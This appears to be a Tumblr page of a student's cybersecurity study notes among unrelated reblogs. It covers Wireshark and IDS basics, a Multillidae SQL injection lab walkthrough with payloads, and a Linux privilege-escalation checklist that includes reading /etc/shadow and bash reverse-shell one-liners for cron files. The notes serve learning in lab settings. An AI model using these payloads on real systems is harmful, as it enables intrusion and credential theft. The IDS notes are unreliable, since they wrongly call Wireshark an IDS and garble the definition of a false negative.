Angela's Cybersec Notes @reverse-shell - Tumblr Blog

Wireshark

I'm studying this book and in this post, I'll write some of the notes that I've made about it!

- Packets are bunches of streaming data in a network.

- Wireshark can capture these packets using a network interface (okay everyone already knows that, just wanted to be clear)

When can we use Wireshark?

To search the reason and the roots of a problem, to search for a protocol or a device stream, and to analyze specific timings, protocols flags, or transmitted bits.

Wireshark user interface: we use a dissector that can parse and decode protocols to present them on the interface.

Wireshark Filters: exhibition filters are all about filtering the protocols that we see on the packet list.

Another interesting thing that I've noticed in the book is the part of IDS that stands for Intrusion Detection System

Detection methods are signature-based or anomalies-based.

Signature-based: detects using what it already knows. The IDS owns a database containing lots of signatures or patterns to be observed. If a captured data match one of the patterns or the signature, it is detected.

Anomalies-based: it is activated when the traffic looks to be suspicious when compared to what is considered normal.

Wireshark is a Signature-based IDS

False-positive occurs when a good event is considered a bad event.

False-negative is when a bad event is detected or is not detected.

Capturing data

Sniffing -> capture of network traffic

----------------------------------------non finished post----------------

OWASP Multillidae II: Web Pwn in Mass Production

Today I started learning and exploring the application Multilidae II, which is a cool project to start learning with hands on practice.

A1. Injection(SQL) > SQLi Extract Data > User Info

The security level of this first challenge is very low, so its not something super difficult.

I started making the application return an error by inserting " a' "

This error show us the query that the server is reading

Query: SELECT * FROM accounts WHERE username='a'' AND password='dfsf' (0) [Exception]

Then i used a' or 1=1 # on the name field and bazinga

Now lets explain this: a' or 1=1 # < what the application is understanding: is user a or 1=1? The or 1=1 is making a TRUE statement, and as this code is valid, it will return all rows from the users table. And the final # is commenting the next parameter from the query.

A1. Injection (SQL) > SQLi Insert Injection > Add to your blog

In the next challenge, we need to add a post pretending to be another person

As always, I will start making the application return me an error using a`

Here is possible to see that the query is using an INSERT statement, and sending the values ('anonymous', 'a'', now())

What we can do here is try to duplicate this using a comma ,

message', '2021-08-25 12:46:25'),('admin', 'msg', now() ) -- -

Basic Enumeration for Linux Privilege ⬆️

I am not a mastermind of privilege escalation, but after all i discovered that its (almost) allll about a good enumeration! This is not the definitive guide, its just a list of useful notes that i was collecting while studying, and as I am not an expert i'm open to suggestions to make this post better.

First, if you have a limited shell:

** ↳ python -c 'import pty;pty.spawn("/bin/bash")**

** ↳ echo os.system('/bin/bash')**

I'ts always good to know the version:

↳ cat /etc/issue

↳ cat /etc/*-release

Kernel version:

↳ cat /proc/version

↳ rpm -q kernel

And about network?

↳ ifconfig -a

What is running?

↳ ps -ef | grep root (or user)

Files with SUID/SGID permissions:

↳ find / -perm -g=s -o -perm -u=s -type f 2>/dev/null

↳ for i in locate -r "bin$"; do find $i ( -perm -4000 -o -perm -2000 ) -type f 2>/dev/null; done

Is /etc/passwd or /etc/shadow visible?

↳ cat /etc/passwd

↳ cat /etc/shadow

View the contents of the system-wide crontab:

↳ cat /etc/crontab

Is there any cron jobs scheduled to run every minute/hour?

↳ #!/bin/bash bash -i >& /dev/tcp/yourip/yourport 0>&1

↳ " ;/bin/bash -c 'bash -i >& /dev/tcp/your ip/your port0>&1' #" >> FILE

sure this post was inspired by:

https://0x00sec.org/t/enumeration-for-linux-privilege-escalation/1959

and

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

noosphe-re

When human beings acquired language, we learned not just how to listen but how to speak. When we gained literacy, we learned not just how to read but how to write. And as we move into an increasingly digital reality, we must learn not just how to use programs but how to make them. In the emerging highly programmed landscape ahead, you will either create the software or you will be the software. It’s really that simple: Program, or be programmed.

Douglas Rushkoff, Program or Be Programmed: Ten Commands for a Digital Age (via inthenoosphere)

Key Terms of Cryptography

Ciphertext - The result of encrypting a plaintext, encrypted data

Cipher - A method of encrypting or decrypting data. Modern ciphers are cryptographic, but there are many non cryptographic ciphers like Caesar.

Plaintext - Data before encryption, often text but not always. Could be a photograph or other file

Encryption - Transforming data into ciphertext, using a cipher.

Encoding - NOT a form of encryption, just a form of data representation like base64. Immediately reversible.

Key - Some information that is needed to correctly decrypt the ciphertext and obtain the plaintext.

Passphrase - Separate to the key, a passphrase is similar to a password and used to protect a key.

Asymmetric encryption - Uses different keys to encrypt and decrypt.

Symmetric encryption - Uses the same key to encrypt and decrypt

Brute force - Attacking cryptography by trying every different password or every different key

Cryptanalysis - Attacking cryptography by finding a weakness in the underlying maths

Alice and Bob - Used to represent 2 people who generally want to communicate. They’re named Alice and Bob because this gives them the initials A and B. https://en.wikipedia.org/wiki/Alice_and_Bob for more information, as these extend through the alphabet to represent many different people involved in communication.

https://tryhackme.com/room/encryptioncrypto101

#myposts

minimalistoncode

small introduction to binary code.

dash-digital

nixcraft

Linux be like

teded

Advice from Algorithms: Time Management Tips (Part 1)

A brand new year is a perfect time to tackle our tendency to procrastinate. But sometimes that procrastination is due to our being genuinely overwhelmed with tasks to complete. It may be a consolation to know that even computers can get overwhelmed, and today, we’re looking to the computer science of scheduling to bring you a hopefully handy tip for handling time this year!

Every operating system has something called the scheduler that tells the CPU how long to work on each task before switching, and what to switch to. Done right, computers move so fluidly between their various responsibilities, they give the illusion of doing everything simultaneously. But we all know what happens when things go wrong. *cue spinning beachball of death*

One of the first insights is that all the time you spend prioritizing your work is time you aren’t spending doing it. For instance, let’s say when you check your inbox, you scan all the messages, choosing which is the most important. Once you’ve dealt with that one, you repeat. Seems sensible, but there’s a problem here. This is what’s known as a quadratic-time algorithm.

With an inbox that’s twice as full, these passes will take twice as long and you’ll need to do twice as many of them! This means four times the work. The programmers of the operating system Linux encountered a similar problem in 2003. Linux would rank every single one of its tasks in order of importance, and sometimes spent more time ranking tasks than doing them. The programmers’ counterintuitive solution was to replace this full ranking with a limited number of priority “buckets.” The system was less precise about what to do next but more than made up for it by spending more time making progress.

So with your emails, insisting on always doing the very most important thing first could lead to a meltdown. Waking up to an inbox three times fuller than normal could take nine times longer to clear. You’d be better off replying in chronological order, or even at random! Surprisingly, sometimes giving up on doing things in the perfect order may be the key to getting them done.

Something to keep in mind as we all try to tackle everything, everyday!

Stay tuned for more tips from the TED-Ed Lesson How to manage your time more effectively (according to machines) - Brian Christian

Animation by Adriatic Animation

maythecodebewithyou

linux filesystem

archosaur-automaton

Did this computer science book need to have the MOST adorable Sauropods on the cover? Yes. Next question

femininefreak

By Illustrator Genevieve Womack

hoursofreading

when i read about women in computer science all i see is ada lovelace, ada lovelace, ada lovelace. maybe i’m not looking hard enough - but there’s nothing about

adele goldberg - one of the seven programmers that developed Smalltalk in 1970’s, one of the first object-oriented programming languages and the base of current Graphic User Interface

shafi goldwasser - winner of the godel prize for theoretical computer science, for her work in creating zero-knowledge proofs, which is crucial to the field of cryptography and complexity theory

dana ulery - first woman engineer at jpl, developing real time tracking systems using a 40 bit word size computer

there are so many! we tend to revere the historical over the recently modern. by all means, ada lovelace is to be lauded for her contributions both don’t forget the millions of known and little known - possibly nameless - women who created this industry.

scientific-women

Safeguarding our lives online requires skills and experiences that lie beyond masculine stereotypes of the hacker and soldier, says Winifred R. Poster.